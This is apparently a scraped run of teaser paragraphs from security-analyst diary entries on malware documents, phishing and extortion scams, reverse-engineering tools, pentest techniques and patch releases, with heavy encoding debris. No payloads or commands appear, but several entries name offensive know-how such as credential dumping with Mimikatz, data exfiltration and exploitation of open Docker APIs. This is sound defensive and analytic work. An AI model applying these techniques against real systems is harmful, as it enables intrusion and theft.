If you haven&#;x26;#;39;t been living under a rock, you probably heard that the NSA released its reverse-engineering tool, Ghidra, at RSA last month. I&#;x26;#;39;ve been an IDA user for years (it&#;x26;#;39;s the primary disassembler we use when I teach FOR610), but I&#;x26;#;39;ve been trying out Ghidra over the last few days since it is free and other malware analysts have been talking about it. This is the first of several diaries I plan to write with suggestions on how to get Ghidra to do things I&#;x26;#;39;ve come to rely on in IDA. And, being a good computer scientist, I start counting a 0, hence part 0.
I have not seen much Fake AntiVirus lately. Maybe I haven&#;x26;#;39;t been looking for it. But this weekend, I received a few identical spam messages with slightly different subjects advertising that I had won a licensed copy of ESET&#;x26;#;39;s NOD32 Anti Virus. Many anti-malware products are offering free or highly discounted initial licenses to lure buyers, so this email may seem legitimate to some, even though it wasn&#;x26;#;39;t done terribly convincing (I am using a script to defang HTML in all email I receive which may account for some of the formatting issues):
From time to time, I get a question about PDFs that have an /OpenAction, but don&#;x26;#;39;t seem to contain (malicious) code.
This week, reader Ahmed submitted a malicious document. Which he was later able to analyse himself:
Reader Chris submitted a PowerShell log. These are interesting too. Here&#;x26;#;39;s what we saw:
In my previous post&#;x26;#;xc2;&#;x26;#;xa0;we&#;x26;#;39;ve gone through some of the basics of analysing Golang binaries. This post will annotate source path and line information to the disassembly in Cutter. If you&#;x26;#;39;re not familiair with Cutter, it is the Qt bases frontend for Radare2.&#;x26;#;xc2;&#;x26;#;xa0;
Passive DNS is not new but remains a very interesting component to have in your hunting arsenal. As defined by CIRCL, a passive DNS is "a database storing historical DNS records from various resources. The historical data is indexed, which makes it searchable for incident handlers, security analysts or researchers". There are plenty of existing passive DNS services: CIRCL&#;x26;#;x5b;1&#;x26;#;x5d;, VirusTotal, RiskIQ, etc. I&#;x26;#;xe2;&#;x26;#;x80;&#;x26;#;x99;m using them quite often but, sometimes, they simply&#;x26;#;xc2;&#;x26;#;xa0;don&#;x26;#;xe2;&#;x26;#;x80;&#;x26;#;x99;t have any record for a domain or an IP address I&#;x26;#;39;m interested in. If you&#;x26;#;xe2;&#;x26;#;x80;&#;x26;#;x99;re working for a big organization or a juicy target (depending on your business), why not operate your own passive DNS? You&#;x26;#;xe2;&#;x26;#;x80;&#;x26;#;x99;ll collect data from your network that will represent the traffic of your own users.
Saturday&#;x26;#;39;s diary entry "VelvetSweatshop Maldocs" is a reminder that Excel spreadsheets encrypted with password "VelvetSweatshop" are opened with Excel without prompting the user for a password.
In diary entry "Sextortion Email Variant: With QR Code", I had to decode a QR code. I didn&#;x26;#;39;t mention it in my diary entry, but I used an online service to decode the QR Code (I didn&#;x26;#;39;t want to use my smartphone).
Encrypted Excel documents can be opened without entering a password, provided the password is "VelvetSweatshop".
Golang is gaining popularity by malware authors, and more golang based malware is being found in the wild. It is also one of my favourite programming languages, especially for all network related applications, for the reasons of:
The extortion attempts haved moved to another step recently. After the â€œsextortionâ€ emails that are propagating for a while, attackers started to flood people with a new type of fake emails and their imaginnation is endless... I received one two days ago and, this time, they go one step further. In many countries, child pornography is, of course, a very strong offense punished by law. What if you received an email from a Central Intelligence Agency officer who reveals that you're listed in an international investigation about a case of child pornography and that you'll be arrested soon? Hopefully, the agent is a â€œnice guyâ€ and, if you pay $10K in Bitcoin, he will be happy to delete your name from the list of bad guys?
In many internal assessments or "recon mission" style engagements, you&#;x26;#;39;ll need to figure out what all the internal subnets are before you can start assessing that address space for issues, targets or whatever you are looking for in that project. Or, as I had this week, the request was for enumeration of all the hosts that AREN&#;x26;#;39;T in AD.
Powershell is a very nice language in Windows environments. With only a few lines of code, we can implement nice featuresâ€¦ for the good or the bad!
I regularly post diary entries analyzing malware. And a couple of times, I posted diary entries of files that turned out to be not malicious.
I helped out someone who was seeing entries in his log file he could not make sense of.
In diary entry "Maldoc Analysis of the Weekend", I use the strings method explained in diary entry "Quickie: String Analysis is Still Useful" to quickly locate the PowerShell command hidden in a malicious Word document.
As promised in yesterday&#;x26;#;39;s diary entry "Finding Property Values in Office Documents", I made a video illustrating 2 methods to extract a property from an Office document.
Another piece of malicious code spotted on GitHub this time. By the way, this is the perfect example to demonstrate that protecting users via a proxy with web-categorization is uselessâ€¦ Event sites from the Alexa Top-1M may deliver malicious content (Github current position is 51). The URL has been found in a classic email phishing attempt. The content was recently uploaded (<24h) when I found it:
Yesterday I stumbled upon a PDF file that was flagged as suspicious by a customer&#;x26;#;39;s anti-malware solution and placed in the quarantine. Later, the recipient contacted the team in charge of emails to access his document because he knew the sender and pretended that the file was legit.
This month, we got patches for 74 vulnerabilities in total. One of them has been exploited and two vulnerabilities have been made public before today.
I made a video for yesterday&#;x26;#;39;s diary entry "Maldoc Analysis of the Weekend" (the analysis of a Word document with VBA launching a PowerShell command).
I did some research into the delivery of the malicious documents I analyzed this weekend (diary entries here and here).
Yesterday I received malicious Office document request15.doc (MD5 8598361ecbbffb35900d0720b0316a56).
Here is an interesting sample! It's a phishing page which entice the user to connect to his/her account to retrieve a potentially interesting document. As you can see, it's a classic one:
User Access Control (UAC) is a feature Microsoft added long time ago (initially with Windows Vista) in an attempt to limit what local administrators can do on Windows. Basically, when a user logs in that is a local administrator, his session token will only have basic privileges, even though the user is actually an administrator.
If you are like me, at some point in most penetration tests you&#;x26;#;39;ll have a session on a Windows host, and you&#;x26;#;39;ll have an opportunity to dump Windows credentials from that host, usually using Mimikatz. Mimikatz parses credentials (either clear-text or hashes) out of the LSASS process, or at least that&#;x26;#;39;s where it started - since it&#;x26;#;39;s original version back in the day, it has expanded to cover several different attack vectors. An attacker can then use these credentials to "pivot" to attack other resources in the network - this is commonly called "lateral movement", though in many cases you&#;x26;#;39;re actually walking "up the tree" to ever-more-valuable targets in the infrastructure.
Caleb, one of our readers has reported that Wikipedia articles have been "primed" and are being used actively in the various fake tech support phone campaigns.&#xc2;&#xa0; For instance, the Wikipedia article for SpyEye (https://en.wikipedia.org/wiki/SpyEye#cite_note-trusteerzeus-5 ) now contains this paragraph:
All too often when doing an internal security assessment or penetration test, a simple NMAP scan will find back-end infrastructure such as RADIUS servers, Hypervisors, iLo, iDRAC and other BMC host addresss - essentially the parts of the datacenter that real people shouldn&#;x26;#;39;t need access to.
Reader Carlos submitted an email with an attachment. It&#;x26;#;39;s a phishing email, the attachment is an HTML file, although the criminals try to make the recipient believe that it is a PDF file.
I created a video showing how to de-obfuscate a DOSfuscated PowerShell command obtained from a maldoc I analyzed in diary entry "De-DOSfuscation Example":
Reader Frank submitted a suspicious email with attachment: a score of zero on VirusTotal, but McAfee warned for an exploit. Taking a look at the content, Frank notice content that looked like encrypted code.
At the Internet Storm Center, we regularly get malware and fraudulent emails including Bitcoin addresses. Like the extortion emails including leaked passwords. And we often search online for these Bitcoin addresses, to see what else we can find.
If you are doing memory forensics using Volatility, maybe you have noticed that one of the disadvantages that you can't do a live analysis. If you need to do live memory forensics, then Rekall is your best friend.
While reviewing my honeypot logs, I found some interesting entries associated with the Mirai botnet starting the 30 November 2018. This is the last log sample that was captured 2 days ago:
In today&#;x26;#;39;s world, we all try to do as much as we can to be secure while online. Most have learned the signs to try to spot phishing attempts: misspelled words, broken english, urgent requests etc. We even implement 2FA to help prove that someone is who they say they are when they are authenticating to a site. As we try to up our security game, the bad guys up their tactics too. Amnesty.org shared an interesting write up about phishing attacks that are bypassing 2FA. According to the article, there is a large phishing campaign that is that is targeting Gmail and Yahoo accounts.
The SANS Holiday Hack Challenge is an annual, free CTF. Most of you already know that.
In most of our networks, endpoints are often the weakest link because there are more difficult to control (example: laptops are travelling, used at home, etc).They can also be located in different locations even countries for biggest organizations. To better manage them, tools can be deployed to perform many different tasks:
The Christmas break is coming for most of us, let&#;x26;#;39;s take some time to share some tips to better protect our computers. The Microsoft Windows OS has plenty of tools that, when properly used, can reduce risks to be infected by a malware. As best practices, we must have antivirus enabled, we can deploy AppLocker to allow only authorized applications to be launched, we can restrict applications to be executed from locations like %APPDATA% or %TEMP% but they are tools that are much more difficult to restrict on a regular host like... Powershell! If you uninstall Powershell from a modern Windows version, you'll simply miss nice features. That&#;x26;#;39;s why, in many cases, a simple uninstall is not possible. That's also the reason why Powershell remains a nice first stage infection method:
Microsoft just published an out-of-band patch for Internet Explorer. It fixes a memory corruption vulnerability in the scripting engine. This vulnerabiliy is identified as %%cve:2018-8653%%.
Reader Jason submitted a malicious document that he analyzed completely. A small problem encountered by Jason was the following: the malicious document, emailed to his users, was contained in a password protected ZIP file.
Over the past several months I have been observing random Remote Desktop Protocol (RDP) activity targeting my honeypot. Back in September, US-Cert  issued an alert regarding RDP being actively used and exploited by malicious actors released by the FBI .
I received some questions about the de-DOSfuscation I did with Python in my last diary entry: "Yet Another DOSfuscation Sample".
First sextortion, now bombstortion?
Here is a nice example of phishing attack that I found while reviewing data captured by my honeypots. We all know that phishing is a pain and attackers are always searching for new tactics to entice the potential victim to click on a link, disclose personal information or moreâ€¦
December 2018 Security Updates
Richard Porter --- ISC Handler on Duty
Reader Vince asked for help with the analysis of a malicious Word document. He started the analysis himself, following the method I illustrated in diary entry "Word maldoc: yet another place to hide a command".
String analysis: extracting and analyzing strings from binary files (like executables) to assist with reverse engineering.
Last week, the arrest of MENG Wanzou made big waves in the news. Ms. Meng was arrested in Canada based on an arrest warrant issued for the United States Department of justice. Ms. Meng, as CFO of Huawei and possible heir to her father, the CEO of Huawei, is assumed to have access to substantial wealth. This led to a wave of advanced fee scams levering this news.
Reader Jason submitted a ZIP file received via email. It contains an MHT file, an when Jason received it, it had 0 detections on VirusTotal.
Last few days we&#;x26;#;39;re seeing increased attacks from %%ip:188.8.131.52%%, which is trying to exploit open Docker instances (%%port:2375%%). The container (being named java123) is based on image ahtihhebs/picture124, and executed with payload:
If you haven&#;x26;#;39;t uninstalled Flash yet, maybe today should be that day. The update posted yesterday has a remote code exec proof-of-concept already here:
In many penetration tests, there&#;x26;#;39;ll be a point where you need to exfiltrate some data. Sometimes this is a situation of "OK, we got the crown jewels, let&#;x26;#;39;s get the data off premise". Or sometimes in this phase of the test the goal is "let&#;x26;#;39;s make some noise and see if they&#;x26;#;39;re watching for data exfiltration - hmm, nothing yet, let&#;x26;#;39;s make some LOUDER noise and see (and so on)". As with most things, there&#;x26;#;39;s a spectrum of methods to move the target data out, with various levels of difficulty for detection.
Reader Mike submitted a malicious Word document. The document (MD5 6c975352821d2532d8387f19457b584e) contains obfuscated VBA code that launches a shell command. That shell command is hidden somewhere in the document (not in the VBA code).
Wireshark version 2.6.5 is available: release notes.
We&#;x26;#;39;ve seen the Elasticsearch being exploited using queries with script_fields for a while now, but we&#;x26;#;39;re seeing an increased activity.
Yesterday, I wrote a diary about a nice obfuscated shell script. Today, I found another example of malicious shell script embedded in an Apple .dmg file (an Apple Disk Image). The file was delivered through a fake Flash update webpage:
One of our readers, Nathaniel Vos, shared an interesting shell script with us and thanks to him! He found it on an embedded Linux device, more precisely, a QNap NAS running QTS 4.3. After some quick investigations, it looked that the script was not brand new. we found references to it already posted in September 2018. But such shell scripts are less common: they are usually not obfuscated and they perform basic features like downloading and installing some binaries. So, I took the time to look at it.
ViperMonkey: a VBA Emulation engine written in Python, designed to analyze and deobfuscate malicious VBA Macros contained in Microsoft Office files.
I made a video for my diary entry "Dissecting a CVE-2017-18822 Exploit":
By default the Docker Engine API listens on a unix socket only,&#;x26;#;xc2;&#;x26;#;xa0;but the http interface can be configured and will&#;x26;#;xc2;&#;x26;#;xa0;listen&#;x26;#;xc2;&#;x26;#;xa0;to&#;x26;#;xc2;&#;x26;#;xa0;port 2375. If you need to have a http listener, configure it to listen on local ip&#;x26;#;39;s only.&#;x26;#;xc2;&#;x26;#;xa0;Shodan will give almost 800 accessible Docker Engine API&#;x26;#;39;s. The&#;x26;#;xc2;&#;x26;#;xa0;Open Docker Engine API&#;x26;#;39;s is being actively scanned, as we&#;x26;#;39;ve detected in our Honeytrap network.
In politic, there is a strategy which says â€œdivide and conquerâ€. It's also true for some pieces of malware that spread their malicious code amongst multiple sources. One of our readers shared a sample of Powershell code found on Pastebin that applies exactly this technique. Thanks to him!
I am sure that many penetration testers among our readers try to minimize their travel. While many years ago we had to be physically present for internal penetration tests, today it is very common that client organizations setup virtual machines for penetration testers, which are then used to perform internal penetration tests.
Apache today released an advisory, urging users who run Apache Struts 2.3.x to update the commons-fileupload component . Struts 2.3.x uses by default the old 1.3.2 version of commons-fileupload. In November of 2016, a deserialization vulnerability was disclosed and patched in commons-fileupload . The vulnerability can lead to arbitrary remote code execution.
Here is another example of malicious Powershell script found while hunting. Such scripts remain a common attack vector and many of them can be easily detected just by looking for some specific strings. Here is an example of YARA rule that I&#;x26;#;39;m using to hunt for malicious Powershell scripts:
About a week ago, I was asked for help with another malicious RTF file.
Last week, on the inception diary of this series , I've talked about LaunchAgent and LaunchDaemon, probably the most known and popular persistence mechanisms under macOS. But there are other mechanisms, definitely not new and well known in the *nix world, which are still linked or managed by launchd :
I received a malicious Word document with detections on VirusTotal, but it does not exhibit malicious behavior in a sandbox.
Microsoft&#;x26;#;39;s Windows Defender on Windows 10 supports sandboxing now.
Reader Tor submitted a suspicious email he received today. It has a Word document attachment, which, no surpise, has VBA macros.
I was asked how I knew that the content of the email in my last diary entry, was compressed RTF.
A few months ago, Rob wrote a nice diary to explain how to dissect a (malicious) Office document (.docx). The approach was to use the OpenXML SDK with Powershell. This is nice but how to achieve the same on a Linux system? One of our readers (thanks Mike!) provided us with the steps to perform the same kind of analysis but on a Kali instance (replace Kali with your preferred distribution).
The most visible scams you typically see are distributed rather broadly without targeting specific groups. They usually operate on the assumption that it will his at least a couple of victims willing to fork over some money for the elusive gain promised by the scam. On the other hand, scams can be more effective if they are targeting smaller groups. The scam can use a message that is particularly focusing on concerns to the group.
I found another interesting piece of malicious Powershell while hunting. The file size is 1.3MB and most of the file is a PE file Base64 encoded. You can immediately detect it by checking the first characters of the string:
Reader Salil asked for help with the analysis of a .MSG file. We talked about the analysis of .MSG files before, and Salil was able to use my oledump.py tool to look into the .msg file, but still had a problem finding URLs he knew were inside the email.
First and foremost, let me start with a disclaimer. As probably most of you may have noticed the similarity, the title of this post, which I hope to be the first of a series, is inspired by the great and amazing work from Adam (@Hexacorn)  â€œBeyond good ol' Run Keyâ€ (which, as of today, reached episode 93!!!), where he writes about all Windows persistence mechanisms he comes across/discovers in his research, which are, as the title suggest, much more than just the Run registry key we all love. In the rare case you have not read it yet, you should asap. Really.
Cisco PSIRT posted a number of advisories yesterday, 17 OCT 2018. For your consideration, seven (7) are rated High, there are eight (8) additional Medium advisories.
Based on Lubuntu-18.04 x64, the RedHunt Linux virtual machine for adversary emulation and threat hunting is a â€œone stop shop for all your threat emulation and threat hunting needs. It integrates an attacker's arsenal as well as defender's toolkit to actively identify the threats in your environment.â€
Following my yesterday diary, I had a deeper look at the malicious AutoIT script dropped in my sandbox. For those who are not aware of AutoIT, it is a BASIC-like scripting language designed for automating Windows tasks. If scripts can be very simple, they can also interact with any feature of the operating system.
Looking back at the story I posted 2 weeks back, on getting target users to leak credentials using malicious UNC links in office (or other) documents ( https://isc.sans.edu/forums/diary/24062/ ) - how would you actually identify a malicious document of this type? After a bit of digging, it turns out that there are a few ways to do this.
For many years I&#;x26;#;39;ve observed requests for page license.php on my webservers, from various IPs and with various User Agent Strings:
In his diary entry "Malware Delivered Through MHT Files", Xavier show some malicious VBA code with obfuscated strings.
This diary is an update to Sextortion - Follow the Money which tracks some of the BTC addresses related the Sextortion campaign still in the wild, but seemingly tailing off at this time.
What are MHT files? Microsoft is a wonderful source of multiple file formats. MHT files are web page archives. Usually, a web page is based on a piece of HTML code with links to external resources, images and other media. MHT files contain all the data related to a web page in a single place and are therefore very useful to archive them. Also called MHTML (MIME Encapsulation of Aggregate HTML Documents), there are encoded like email messages using MIME parts.
)[Disclaimer: This article deals with legacy IPv4 networks. IPV6 has cleaned up some of the fragmentation issues, and it looks like IPv4 is backporting some of these changes]
Microsoft released patches for 61 vulnerabilities. In addition, we got two advisories. One for the usual update for Flash, and one for a Windows DoS vulnerability.
Reader Matt was targeted with malware via email, and managed to start to analyze the content of the ZIP file served by the compromised server. It contains a .lnk file. Matt figured out that it launches the following PowerShell command:
I created a video for my diary entry "Using scdbg to analyze shellcode". In this video, I also show how to analyze shellcode with a reverse tcp shell, by setting up a server listening on the appropriate TCP port.